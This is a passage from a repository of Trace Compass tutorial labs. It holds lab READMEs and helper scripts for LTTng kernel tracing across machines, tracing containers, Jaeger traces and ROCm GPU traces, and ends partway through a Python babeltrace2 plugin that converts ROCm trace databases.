other approaches are available. See [this blog post](http://versatic.net/tracecompass/synchronization/2018/01/15/synchronization-and-ntp.html) for more details. 188 | 189 | - - - 190 | 191 | #### Next 192 | 193 | * [Tracing Containers](../302-system-tracing-containers) 194 | or 195 | * [Jaeger OpenTracing Traces](../303-jaeger-opentracing-traces) to see how Open Tracing traces can be used to add userspace information to this kind of experiment 196 | * [Back](../) for more options 197 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/criticalPathWgetCold.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/criticalPathWgetCold.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/criticalPathWgetHot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/criticalPathWgetHot.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/eventMatchingNoSync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/eventMatchingNoSync.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/eventMatchingSync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/eventMatchingSync.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/importExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/importExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/openAsExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/openAsExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/openExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/openExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/synchronizationResults.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/synchronizationResults.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/synchronizeTraces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/synchronizeTraces.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/payload: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | SITE=$1 4 | 5 | wget $SITE 6 | sleep 1 7 | wget $SITE 8 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/setupKernelTrace: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | NAME=$1 4 | 5 | if [ -z "$NAME" ] 6 | then 7 | NAME=trace_$(date +"%y%m%d_%H%M") 8 | fi 9 | 10 | lttng create --output ~/lttng-traces/$NAME 11 | lttng enable-channel --kernel --num-subbuf 8 --subbuf-size 1024K more-subbuf 12 | # scheduling 13 | lttng enable-event -k --channel more-subbuf sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup 14 | lttng enable-event -k --channel more-subbuf irq_softirq_entry,irq_softirq_raise,irq_softirq_exit 15 | lttng enable-event -k --channel more-subbuf irq_handler_entry,irq_handler_exit 16 | lttng enable-event -k --channel more-subbuf --syscall --all 17 | lttng enable-event -k --channel more-subbuf lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,lttng_statedump_interrupt 18 | # Block I/O 19 | lttng enable-event -k --channel more-subbuf block_rq_complete,block_rq_insert,block_rq_issue 20 | lttng enable-event -k --channel more-subbuf block_bio_frontmerge,sched_migrate,sched_migrate_task 21 | # cpu related 22 | lttng enable-event -k --channel more-subbuf power_cpu_frequency 23 | # network events 24 | lttng enable-event -k --channel more-subbuf net_dev_queue,netif_receive_skb,net_if_receive_skb 25 | # timer events 26 | lttng enable-event -k --channel more-subbuf timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 27 | # Additional events for wifi 28 | #lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 29 | #lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 30 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/traceClientServer: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | USER=$1 4 | SERVER=$2 5 | URL=$3 6 | if [ -z "$USER" ] || [ -z "$SERVER" ] || [ -z "$URL" ] 7 | then 8 | echo "Usage: ./traceClientServer " 9 | echo "" 10 | echo "Example: ./traceClientServer myUser 5.5.5.2 http://www.polymtl.ca" 11 | exit 0 12 | fi 13 | 14 | TRACE_NAME=serverTrace 15 | 16 | # Start tracing on the server side through ssh 17 | ssh $USER@$SERVER ./setupKernelTrace $TRACE_NAME 18 | ssh $USER@$SERVER lttng start 19 | # Record the client payload 20 | # If the client is a machine with wifi, replace this call to a full manual setup 21 | # of the kernel trace and uncomment the lines for the additional kernel --function lines 22 | lttng-record-trace ./payload $URL 23 | # Stop tracing the server 24 | ssh $USER@$SERVER lttng destroy 25 | 26 | # Get the trace from the server 27 | rsync -avz $USER@$SERVER:~/lttng-traces/$TRACE_NAME ./ 28 | -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/README.md: -------------------------------------------------------------------------------- 1 | ## System Tracing and Containers 2 | 3 | In this lab, we will see the specifities of containers when it comes time to do system tracing and what Trace Compass can show about them. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. 6 | 7 | - - - 8 | 9 | ### Task 1: Understanding containers and system tracing 10 | 11 | Containers are software schemes that allow to isolate runtime environments from other containers and the environment that hosts it. It has been compared with a `chroot` on steroids, where whole systems can run in complete isolation. It is much lighter than virtual machines because it shares a lot of resources with its host, and thus does not need a complete OS installation on the side, and its storage is often directly on the host system, so no need to assign disk files to the container. 12 | 13 | One of the resources shared with the host is **the kernel**. There is one kernel for all the containers running in the machine. It is thus impossible for the container to do anything specific to the kernel, like installing modules or... tracing. So how can we trace containers? Simply said, by tracing the host. But tracing the host will see everything that happens on the system, ie the container we're interested in and all the other ones. 14 | 15 | At the kernel level, containerization is managed using `cgroups` and `namespaces`. Processes and threads are assigned to cgroups and namespaces. By analyzing those associations, we can have a picture of our system's containerization. Namespaces can be nested within other namespaces. 16 | 17 | Since containers are managed at very low level in the kernel, *tracing containers* does not require any additional modules, all the information is already in the trace, at least with `LTTng`. `ftrace` and `perf` do not seem to have the proper event fields. 18 | 19 | - - - 20 | 21 | ### Task 2: Get a Trace for Containers 22 | 23 | If you have access to a machine with containers, you may obtain a trace of that machine from the host itself. See the [trace recording lab](../003-record-kernel-trace-lttng/) for instructions on how to record a trace. 24 | 25 | The `namespace` information is important to match threads and processes to containers. This information is available when forking a process, so in the `sched_process_fork` event. But for the process that are already started at the beginning of the trace, one needs the `lttng_statedump_process_state` event, that advertises the namespaces and virtual TIDs of each thread in each of those namespaces. 26 | 27 | For a test trace, the `httpServer` trace of the [previous lab](../301-tracing-multiple-machines), in the `301-tracing-multiple-machines` directory, traced a web server in a docker container, so this trace can be used for this lab. 28 | 29 | - - - 30 | 31 | ### Task 3: Install the Trace Compass Plugin for Container Analysis 32 | 33 | To obtain additional views in Trace Compass for container analysis, you need to install the `Virtual Machine and Container Analysis (Incubator)` feature from the *Tools* -> *Addons...* menu and click *Finish*. 34 | 35 | ![InstallVMPlugin](screenshots/installVMPlugin.png "Install Virtual Machine Plugin") 36 | 37 | - - - 38 | 39 | ### Task 4: Open the Trace as "Virtual Machine Experiment (incubator)" 40 | 41 | The *Virtual Machine and Container* analyses are available for the *Virtual Machine* experiment type. So even though there is only one trace, you still need to open it as an experiment. 42 | 43 | Import the trace like you would any other trace, then, in the `Project Explorer`, right-click on the trace and select *Open as Experiment...* -> *Virtual Machine Experiment (incubator)*. It will open the trace, and you can see it under the *Experiments* folder. It will have the same name as the trace that's inside. 44 | 45 | ![VirtualMachineExperiment](screenshots/vmExperimentContainer.png "Virtual Machine Experiment For Containers") 46 | 47 | - - - 48 | 49 | ### Task 5: View the container status 50 | 51 | Expand the experiment you just opened in the `Project Explorer`, expand the `Views` item and `Fused Virtual Machine Analysis (incubator)`. Open the `Virtual Resources (incubator)` view. 52 | 53 | This views shows the usage of the physical resources (CPU) by the several levels of container/virtualization. The first level shows everything that happens on the physical CPUs. Lower down in the view is the *Container* item, under which would appear all containers, sorted hierarchically (if there are nested containers). Each entry under that containers show the usage of the physical resources **by this container**. 54 | 55 | ![VirtualResourcesContainer](screenshots/virtualResourcesContainer.png "Virtual Resources Container") 56 | 57 | We can highlight the usages of a single container by clicking on the *Select Machine* button and checking the container to highlight. 58 | 59 | ![SelectContainer](screenshots/selectContainer.png "Select Container") 60 | 61 | ![VirtualResourcesContainerHighlighted](screenshots/virtualResourcesContainerHighlighted.png "Virtual Resources Container Highlighted") 62 | 63 | When we zoom in one the zones where there's a bit more activity on the container, we see the `apache2` and `mysqld` processes running. In the tooltip, we see the various TIDs of each thread at different levels of nesting. The following screenshots shows a mysqld state, where the real physical *TID* of the thread is 9910, which is the TID we should look for in the `Control Flow` view for instance, to get a critical path. But the *vTID* shows the TID from the container's perspective, so if ssh'ing into the container, we would recognize this process with TID 894. 64 | 65 | ![VirtualResourcesZoomIn](screenshots/virtualResourcesZoomIn.png "Virtual Resources Container Zooming In") 66 | 67 | - - - 68 | 69 | ### Conclusion 70 | 71 | This lab has shown the current state of Trace Compass with regards to container. It can show how physical CPUs are being used by a container and can thus show in the same view what is happening on the machine that is not a container. So, for instance, we can analyze why a container is slow, see if other containers or host processes were doing contention on the resources, etc. 72 | 73 | More work on containers is under way. Students at École Polytechnique are working on showing the resource usages wrt to the cgroup associated with a container. One could limit physical resource consumption using cgroup, and we want to show the status of the container in regards of those resources. Also, we may not be able to do kernel tracing in a container, but userspace tracing can be done, and could interact with lttng sessiond to exchange information that is not available to the host, etc. 74 | -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/installVMPlugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/installVMPlugin.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/selectContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/selectContainer.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesContainer.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesContainerHighlighted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesContainerHighlighted.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesZoomIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesZoomIn.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/vmExperimentContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/vmExperimentContainer.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/README.md: -------------------------------------------------------------------------------- 1 | ## Importing and Analysing Jaeger Traces in Trace Compass 2 | 3 | In this lab, you will learn to use Trace Compass to upload and analyse Jaeger traces, obtained from distributed applications instrumented with OpenTracing API. Jaeger already provides a very good visualization of those traces, but with TraceCompass, those traces can be analyzed along with other system and application traces. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass) lab or read the [TraceCompass web site](https://tracecompass.org) for more information. This lab is not a tutorial about OpenTracing or Jaeger. It supposes that you know about these, but it provides all the necessary material to use Trace Compass with example traces, without having access to a Jaeger infrastructure. 6 | 7 | - - - 8 | 9 | ### Task 1: Tracing with Jaeger 10 | 11 | All you need to know to start tracing can be found on Jaeger Tracing website. 12 | 13 | [Getting started with Jaeger](https://www.jaegertracing.io/docs/getting-started/) 14 | 15 | - - - 16 | 17 | ### Task 2: Installing Open Tracing Plug-in 18 | 19 | You can install the *Open Tracing* trace type in *Tools* -> *Adds-on...*. Check the `Trace Compass opentracing (incubation)` feature and click *Finish*. Follow the instructions on screen. 20 | 21 | ![AddsOn](screenshots/installPlugIn.png "Trace Compass Install Plug In") 22 | 23 | - - - 24 | 25 | ### Task 3: Fetching Jaeger Traces 26 | 27 | Once you have Jaeger running and traced some traces, you can fetch those traces directly into Trace Compass. All you need to do is right click on the Traces folder in the Project Explorer. 28 | 29 | ![RightClickMenu](screenshots/rightClickMenu.png "Trace Compass Traces Menu") 30 | 31 | You will be able to set all the filters you want to apply to your traces request. Once you click the fetch button, you will see a list of traces from which you can select the ones you want to import. 32 | 33 | ![FetchWindow](screenshots/fetchWindow.png "Trace Compass Fetch Jaeger Window") 34 | 35 | Once you click finish, your traces will be imported in your workspace. 36 | 37 | ![FetchedTraces](screenshots/fetchedTraces.png "Trace Compass Fetched Traces") 38 | 39 | You can also open one of the traces in the `303-jaeger-opentracing-traces` directory in the trace archive of this tutorial. 40 | 41 | - - - 42 | 43 | ### Task 4: Exploring the perspective components 44 | 45 | When you open an Open Tracing trace (double click on any imported trace), you should obtain a view that looks like this. 46 | 47 | ![Perspective](screenshots/perspective.png "Trace Compass Open Tracing Perspective") 48 | 49 | Open Tracing perspective contains: 50 | 51 | - Project Explorer: List of your experiments as well as your traces. 52 | - Spans Life View: Time graph representation of the span's relationships. 53 | - Events Table: Information of every every event as well as every span in the trace. Equivalent of the Jaeger "Spans List". 54 | - Histogram: Overview of the spans occurences on a time basis. 55 | 56 | - - - 57 | 58 | ### Task 5: Analysing an Open Tracing Trace 59 | 60 | The main view is the `Span Life` view. It provides an overview of the spans. On the left of the view we can see the list of spans aggregated based on the child-parent relationships between the spans. You can also see a red circle next to some span name that represent an error tag. Different symbols are displayed on the spans where there are logs. Each symbol represents a certain type of log. For exemple, `X`'s are errors. If you place your cursor over a log, you will have the information relative to this particular log. 61 | 62 | ![SpanLifeView](screenshots/spanLifeView.png "Trace Compass Span Life View") 63 | 64 | You can access the legend via the legend button on top of the Span Life View. You have the possibility to change the color and the size of the different logs symbols. 65 | 66 | ![Legend](screenshots/legend.png "Trace Compass Span Life Legend") 67 | 68 | - - - 69 | 70 | ### Conclusion 71 | 72 | This lab shows the work that has been done to integrate OpenTracing API instrumented applications in Trace Compass. Jeager is the provider of the traces in our case. With system traces to augment this data, we could know what is happening during the spans. There is a lot of future work still to do for this feature. Feedback is welcome. 73 | -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/fetchWindow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/fetchWindow.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/fetchedTraces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/fetchedTraces.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/installPlugIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/installPlugIn.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/legend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/legend.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/perspective.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/perspective.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/rightClickMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/rightClickMenu.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/spanLifeView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/spanLifeView.png -------------------------------------------------------------------------------- /labs/304-rocm-traces/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing and Analysing ROCm traces in Trace Compass 2 | 3 | This tutorial will guide you through getting a trace with ROC-profiler and ROC-tracer and opening it with the Theia-trace-extensions. 4 | 5 | *Disclaimer*: A lot of tools and commands are subject to change, thus this tutorial might not be up-to-date. 6 | 7 | *Pre-requisites*: 8 | - Have ROCm installed with a [compatible GPU](https://github.com/RadeonOpenCompute/ROCm#Hardware-and-Software-Support) with ROC-profiler and ROC-tracer. You can follow the [ROCm Installation](https://rocmdocs.amd.com/en/latest/Installation_Guide/Installation-Guide.html) to get everything installed. 9 | - Have babeltrace2 and python3-bt2 installed. Once you have added the LTTng ppa, you will be able to install python3-bt2 through apt. [Get babeltrace](https://babeltrace.org/#bt2-get) 10 | - Java 11 11 | Ubuntu: `apt-get install openjdk-11-jdk` 12 | Fedora: `dnf install java-11-openjdk.x86_64` 13 | - If you intend to use the Theia trace extension, you will need to install the [pre-requisites for the Theia IDE](https://github.com/eclipse-theia/theia/blob/master/doc/Developing.md#prerequisites) 14 | 15 | - - - 16 | 17 | ### Task 1: Tracing with ROC-tracer and ROC-profiler 18 | 19 | ROCm comes with two profiling tools [ROC-profiler]() and [ROC-tracer](). Both are piloted using the same rocprof script. To get a trace you just need a program that uses the ROCm stack to execute, it can be a deep learning application that uses the ROCm pytorch or a C++ that uses HIP kernels. If you need more details, you can look at [AMD's documentation](https://rocmdocs.amd.com/en/latest/ROCm_Tools/ROCm-Tools.html). In this tutorial we will focus on tracing and not on performance counters. 20 | There are three types of events: activity events, API events and user annotations. The activity events are all the GPU related events, it can be memory transfers or kernel executions. The API events are tracepoints at the beginning and end of every API functions. The API can be HSA, HIP or KFD. And finally, you can place your own tracepoints in your application and they will generate user annotation events, using the roctx library. 21 | To get a trace that records HIP API calls using rocprof, you can run the following command: 22 | ``` 23 | $ rocprof --hip-trace 24 | ``` 25 | This will generate 'results' files. You can use some of these with automated scripts, the file that is useful to generate a CTF trace is the 'results.db' file. If you want a different name for these files, you can use the '-o' parameter. 26 | 27 | ### Task 2: Generate a CTF trace using babeltrace 28 | 29 | In the scripts folder, two scripts are present: ctftrace.py and bt_plugin_rocm.py. These files are using babeltrace to convert the sqlite database file obtained at the previous task to a CTF trace readable by Trace Compass. 30 | ``` 31 | $ python3 ctftrace.py .db 32 | ``` 33 | This can take some time to generate the CTF trace if your trace file is over 500 MB. 34 | 35 | ### Task 3: Run the Theia trace extension 36 | 37 | You can also open the trace with [Trace Compass](../006-installing-tracecompass/), but we will not cover that use case in this tutorial. 38 | 39 | To open the trace with the Theia-trace-extension, you will need to build the example application. We will explain how to do it here but for reference, here is a link to the [official instructions](https://github.com/theia-ide/theia-trace-extension#build-the-extension-and-example-application). 40 | 41 | 1. Clone the theia-trace-extensions repository `git clone https://github.com/theia-ide/theia-trace-extension.git` 42 | 2. `cd theia-trace-extensions` 43 | 3. Download the Trace Compass Server: `yarn download:server` 44 | 3. Build the application: `yarn` 45 | 4. Run the browser app: `yarn start:browser` 46 | 47 | ### Task 4: Opening the trace with the Theia trace extension 48 | 49 | ![theia-trace-extension-open-trace](https://raw.githubusercontent.com/tuxology/tracevizlab/master/labs/304-rocm-traces/screenshots/openATrace.gif) -------------------------------------------------------------------------------- /labs/304-rocm-traces/screenshots/openATrace.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/304-rocm-traces/screenshots/openATrace.gif -------------------------------------------------------------------------------- /labs/304-rocm-traces/scripts/bt_plugin_rocm.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module is a source plugin for babeltrace 2 to read traces from ROC-tracer and ROC-profiler. 3 | 4 | To add or edit an event type, you have to : 5 | - Add/Edit a parsing function which takes the row as parameters. 6 | - Add/Edit the SQL table name in the table_name_to_event_type dictionary associated with the event type. 7 | - Add/Edit an entry into the event_types dictionary filling in get_row_func and the fields keys. 8 | 9 | If you have fields that are optional for the event type, you need to: 10 | - Add the added_field parameters to the parsing function 11 | - Add the fields with the add_optional_fields function in the __init__ method of the RocmSource class. 12 | """ 13 | 14 | import bt2 15 | import os 16 | import uuid 17 | import sys 18 | import sqlite3 19 | import time 20 | from heapq import heappush, heappop 21 | 22 | 23 | def get_compute_kernel_hsa_row(row, added_fields): 24 | added_fields = { field: int(row[field]) for field in added_fields } 25 | return ( 26 | int(row["BeginNs"]), 27 | int(row["EndNs"]), 28 | { 29 | **added_fields, 30 | "kernel_name" : row["KernelName"], 31 | "gpu_id": int(row["gpu-id"]), 32 | "queue_id": int(row["queue-id"]), 33 | "kernel_dispatch_id": int(row["Index"]), 34 | "pid": int(row["pid"]), 35 | "tid": int(row["tid"]), 36 | "grd": int(row["grd"]), 37 | "wgr": int(row["wgr"]), 38 | "lds": int(row["lds"]), 39 | "scr": int(row["scr"]), 40 | "vgpr": int(row["vgpr"]), 41 | "sgpr": int(row["sgpr"]), 42 | "fbar": int(row["fbar"]), 43 | "sig": row["sig"], 44 | "obj": row["obj"], 45 | "dipatch_time": int(row["DispatchNs"]), 46 | "complete_time": int(row["CompleteNs"]), 47 | } 48 | ) 49 | 50 | def get_hcc_ops_row(row): 51 | return ( 52 | int(row["BeginNs"]), 53 | int(row["EndNs"]), 54 | { 55 | "name": row["Name"], 56 | "queue_id": int(row["queue-id"]), 57 | "tid": int(row["tid"]), 58 | "pid": int(row["proc-id"]), 59 | "stream_id": int(row["dev-id"]), 60 | "index": int(row["Index"]) 61 | } 62 | ) 63 | 64 | def get_async_copy_row(row): 65 | return ( 66 | int(row["BeginNs"]), 67 | int(row["EndNs"]), 68 | { 69 | "pid": int(row["proc-id"]), 70 | "name": "async-copy", 71 | "index": row["Index"] 72 | } 73 | ) 74 | 75 | def get_api_row(row): 76 | return ( 77 | int(row["BeginNs"]), 78 | int(row["EndNs"]), 79 | { 80 | "tid": int(row["tid"]), 81 | "name": row["Name"], 82 | "args": row["args"], 83 | "index": int(row["Index"]) 84 | } 85 | ) 86 | 87 | def get_roctx_row(row): 88 | pass 89 | return ( 90 | int(row["BeginNs"]), 91 | -1, 92 | { 93 | "pid": int(row["pid"]), 94 | "tid": int(row["tid"]), 95 | "name": row["Name"], 96 | } 97 | ) 98 | 99 | 100 | table_name_to_event_type = { 101 | "A": "compute_kernels_hsa", 102 | "OPS": "hcc_ops", 103 | "COPY": "async_copy", 104 | "HSA": "hsa_api", 105 | "HIP": "hip_api", 106 | "KFD": "kfd_api", 107 | "rocTX": "roctx" 108 | } 109 | event_types = { 110 | "compute_kernels_hsa": { 111 | "get_row_func": get_compute_kernel_hsa_row, 112 | "fields": { 113 | "kernel_name" : "string", 114 | "gpu_id": "unsigned_integer", 115 | "queue_id": "unsigned_integer", 116 | "kernel_dispatch_id": "unsigned_integer", 117 | "pid": "unsigned_integer", 118 | "tid": "unsigned_integer", 119 | "grd": "unsigned_integer", 120 | "wgr": "unsigned_integer", 121 | "lds": "unsigned_integer", 122 | "scr": "unsigned_integer", 123 | "vgpr": "unsigned_integer", 124 | "sgpr": "unsigned_integer", 125 | "fbar": "unsigned_integer", 126 | "sig": "string", 127 | "obj": "string", 128 | "dipatch_time": "unsigned_integer", 129 | "complete_time": "unsigned_integer", 130 | } 131 | }, 132 | "hcc_ops": { 133 | "get_row_func": get_hcc_ops_row, 134 | "fields": { 135 | "name": "string", 136 | "queue_id": "unsigned_integer", 137 | "tid": "unsigned_integer", 138 | "pid": "unsigned_integer", 139 | "stream_id": "unsigned_integer", 140 | "index": "unsigned_integer", 141 | } 142 | }, 143 | "async_copy": { 144 | "get_row_func": get_async_copy_row, 145 | "fields": { 146 | "pid": "unsigned_integer", 147 | "name": "string", 148 | "index": "unsigned_integer", 149 | } 150 | }, 151 | "hsa_api": { 152 | "get_row_func": get_api_row, 153 | "fields": { 154 | "tid": "unsigned_integer", 155 | "name": "string", 156 | "args": "string", 157 | "index": "unsigned_integer", 158 | } 159 | }, 160 | "hip_api": { 161 | "get_row_func": get_api_row, 162 | "fields": { 163 | "tid": "unsigned_integer", 164 | "name": "string", 165 | "args": "string", 166 | "index": "unsigned_integer", 167 | } 168 | }, 169 | "kfd_api": { 170 | "get_row_func": get_api_row, 171 | "fields": { 172 | "tid": "unsigned_integer", 173 | "name": "string", 174 | "args": "string", 175 | "index": "unsigned_integer", 176 | } 177 | }, 178 | "roctx": { 179 | "get_row_func": get_roctx_row, 180 | "fields": { 181 | "pid": "unsigned_integer", 182 | "tid": "unsigned_integer", 183 | "name": "string", 184 | } 185 | }, 186 | } 187 | 188 | 189 | def connect_to_db(input_db): 190 | if os.path.isfile(input_db) and input_db[-3:] == ".db": 191 | connection = sqlite3.connect(input_db) 192 | return connection 193 | return None 194 | 195 | 196 | def detect_input_table(connection): 197 | cursor_tables = connection.cursor() 198 | cursor_tables.execute("SELECT name FROM sqlite_master WHERE type='table';") 199 | event_types_detected = {} 200 | for table in cursor_tables: 201 | row_count = connection.execute("SELECT COUNT(*) FROM " + table[0]).fetchone() 202 | if row_count[0] > 0: 203 | event_type = table_name_to_event_type[table[0]] 204 | event_types_detected[event_type] = { 205 | **event_types[event_type], 206 | "table_input": table[0] 207 | } 208 | return event_types_detected 209 | 210 | 211 | def get_payload_class(event_type, trace_class, payload_class): 212 | for field in event_type["fields"]: 213 | if event_type["fields"][field] == "string": 214 | payload_class += [(field, trace_class.create_string_field_class())] 215 | elif event_type["fields"][field] == "unsigned_integer": 216 | payload_class += [(field, trace_class.create_unsigned_integer_field_class())] 217 | if "added_fields" not in event_type: return 218 | for field in event_type["added_fields"]: 219 | payload_class += [(field, trace_class.create_unsigned_integer_field_class())] 220 | 221 | 222 | def add_optional_fields(connection, event_type): 223 | cursor = connection.cursor() 224 | cursor.execute("PRAGMA table_info({})".format(event_type["table_input"])) 225 | blacklist = [ 226 | *event_type["fields"].keys(), "Index", "KernelName", "gpu-id", "queue-id", "queue-index", 227 | "DispatchNs", "BeginNs", "EndNs","CompleteNs","DurationNs" 228 | ] 229 | event_type["added_fields"] = {} 230 | for row in cursor: 231 | if row[1] not in blacklist: 232 | event_type["added_fields"][row[1]] = "unsigned_integer" 233 | return event_type 234 | 235 | 236 | class RocmAPIMessageIterator(bt2._UserMessageIterator): 237 | def __init__(self, config, self_output_port): 238 | self._trace = self_output_port.user_data["trace"] 239 | self._event_type = self_output_port.user_data["event_type"] 240 | self._connection = self_output_port.user_data["connection"] 241 | 242 | # Initializes the data objects for trace parsing 243 | self._stream = self._trace.create_stream(self._event_type["stream_class"]) 244 | self._connection.row_factory = sqlite3.Row 245 | self._table_cursor = self._connection.execute("SELECT * FROM {} ORDER BY BeginNs;".format(self._event_type["table_input"])) 246 | 247 | # Because events are stored in a begin:end fashion, some end events occur after the 248 | # start of the next event. We store the event messages to keep the events ordered 249 | self._buffer = [] 250 | self._size_buffer = 30 251 | self._insert_buffer_begin_end() 252 | # heappush and heappop will compare against the first element of the tuple. In this case, 253 | # this element is the timestamp. However, when the timestamps are equal, it will compare against 254 | # the second element, so to manage this case, we put a counter. 255 | self._integer = 0 256 | 257 | def _insert_buffer_begin_end(self): 258 | heappush( 259 | self._buffer, 260 | (0, 0, self._create_stream_beginning_message(self._stream)) 261 | ) 262 | heappush( 263 | self._buffer, 264 | (sys.maxsize, sys.maxsize, self._create_stream_end_message(self._stream)) 265 | ) 266 | 267 | def _process_row(self, row): 268 | # Parsing the line to get payload and timestamp information 269 | if "added_fields" in self._event_type: 270 | (time_begin, time_end, fields) = self._event_type["get_row_func"](row, self._event_type["added_fields"]) 271 | else: 272 | (time_begin, time_end, fields) = self._event_type["get_row_func"](row) 273 | # Create event message 274 | def fill_and_push_msg(timestamp, fields, name_suffix): 275 | msg = self._create_event_message( 276 | self._event_type["event_class"], 277 | 